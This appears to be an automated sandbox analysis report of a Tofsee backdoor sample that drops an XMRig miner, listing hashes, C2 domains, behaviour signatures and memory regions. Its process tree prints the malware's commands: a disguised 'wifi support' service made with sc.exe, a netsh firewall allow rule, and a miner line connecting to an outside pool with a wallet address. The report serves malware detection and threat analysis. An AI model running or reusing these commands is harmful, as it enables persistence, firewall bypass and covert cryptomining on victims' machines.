Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    17-04-2023 16:04

General

  • Target

    file.exe

  • Size

    212KB

  • MD5

    8ede678cf734084b01751c5d54f7fba3

  • SHA1

    a706bed4987a37e4ee7367a28c144a57264c292b

  • SHA256

    1cf2f9ca3cc70c2919ba016a0166a95c81e1a09e95aaa5efb74c17e2a211c218

  • SHA512

    a189411e8de914453ed6e96cee2d99395f36caf89f75fd738f53cf62fd827ecd34cee1ad10761db77a99b374d4003645542b446aaec51887d3228da5473b7135

  • SSDEEP

    3072:Q/w2vKhLFzNxTvoecRDZFuxnpxyNmH25p062a3F5+mI7iMD:CWLFzN1y/Ytpt23V2a2J7iM

Malware Config

Extracted

Family

tofsee

C2

vanaheim.cn

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 7 IoCs
  • Creates new service(s) 1 TTPs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1336
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hcdayqcu\
      2⤵
        PID:1856
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\xnjytljr.exe" C:\Windows\SysWOW64\hcdayqcu\
        2⤵
          PID:296
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create hcdayqcu binPath= "C:\Windows\SysWOW64\hcdayqcu\xnjytljr.exe /d\"C:\Users\Admin\AppData\Local\Temp\file.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:1796
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description hcdayqcu "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:776
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start hcdayqcu
          2⤵
          • Launches sc.exe
          PID:1144
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:1840
      • C:\Windows\SysWOW64\hcdayqcu\xnjytljr.exe
        C:\Windows\SysWOW64\hcdayqcu\xnjytljr.exe /d"C:\Users\Admin\AppData\Local\Temp\file.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2000
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:1140
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1684

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\xnjytljr.exe
        Filesize

        12.2MB

        MD5

        0b7cfa8c65043fcac0552860e1df3a39

        SHA1

        ad0c5e95fe2a7c7d0dbbe11c7670c52dbcddb945

        SHA256

        80331754d809ee4a51dc7340a46174baca0b7ea6f7fa6df8cbc4c408f573a849

        SHA512

        7b5f9e112ac915a68c39c34a515722aa2e992b9329ed50a528942edf07f6b9aa9e8767721c6ad33b325d1ea01625e9e5f53754f81e5ac22a302f9a14a27cb4ab

      • C:\Windows\SysWOW64\hcdayqcu\xnjytljr.exe
        Filesize

        12.2MB

        MD5

        0b7cfa8c65043fcac0552860e1df3a39

        SHA1

        ad0c5e95fe2a7c7d0dbbe11c7670c52dbcddb945

        SHA256

        80331754d809ee4a51dc7340a46174baca0b7ea6f7fa6df8cbc4c408f573a849

        SHA512

        7b5f9e112ac915a68c39c34a515722aa2e992b9329ed50a528942edf07f6b9aa9e8767721c6ad33b325d1ea01625e9e5f53754f81e5ac22a302f9a14a27cb4ab

      • memory/1140-88-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1140-106-0x0000000000530000-0x0000000000537000-memory.dmp
        Filesize

        28KB

      • memory/1140-62-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
        Filesize

        4KB

      • memory/1140-90-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1140-63-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1140-91-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1140-67-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1140-68-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1140-69-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1140-71-0x00000000019A0000-0x0000000001BAF000-memory.dmp
        Filesize

        2.1MB

      • memory/1140-74-0x00000000019A0000-0x0000000001BAF000-memory.dmp
        Filesize

        2.1MB

      • memory/1140-75-0x0000000000110000-0x0000000000116000-memory.dmp
        Filesize

        24KB

      • memory/1140-78-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1140-81-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1140-82-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1140-83-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1140-84-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1140-92-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1140-86-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1140-87-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1140-110-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1140-89-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1140-61-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1140-105-0x0000000005450000-0x000000000585B000-memory.dmp
        Filesize

        4.0MB

      • memory/1140-85-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1140-93-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1140-94-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1140-95-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1140-96-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1140-97-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1140-98-0x00000000001B0000-0x00000000001B5000-memory.dmp
        Filesize

        20KB

      • memory/1140-101-0x00000000001B0000-0x00000000001B5000-memory.dmp
        Filesize

        20KB

      • memory/1140-102-0x0000000005450000-0x000000000585B000-memory.dmp
        Filesize

        4.0MB

      • memory/1336-60-0x0000000000400000-0x00000000004A2000-memory.dmp
        Filesize

        648KB

      • memory/1336-56-0x0000000000220000-0x0000000000233000-memory.dmp
        Filesize

        76KB

      • memory/1684-123-0x00000000000C0000-0x00000000001B1000-memory.dmp
        Filesize

        964KB

      • memory/1684-111-0x00000000000C0000-0x00000000001B1000-memory.dmp
        Filesize

        964KB

      • memory/1684-112-0x00000000000C0000-0x00000000001B1000-memory.dmp
        Filesize

        964KB

      • memory/1684-116-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
        Filesize

        4KB

      • memory/1684-119-0x00000000000C0000-0x00000000001B1000-memory.dmp
        Filesize

        964KB

      • memory/1684-120-0x00000000000C0000-0x00000000001B1000-memory.dmp
        Filesize

        964KB

      • memory/1684-121-0x00000000000C0000-0x00000000001B1000-memory.dmp
        Filesize

        964KB

      • memory/1684-122-0x00000000000C0000-0x00000000001B1000-memory.dmp
        Filesize

        964KB

      • memory/1684-124-0x00000000000C0000-0x00000000001B1000-memory.dmp
        Filesize

        964KB

      • memory/2000-64-0x0000000000400000-0x00000000004A2000-memory.dmp
        Filesize

        648KB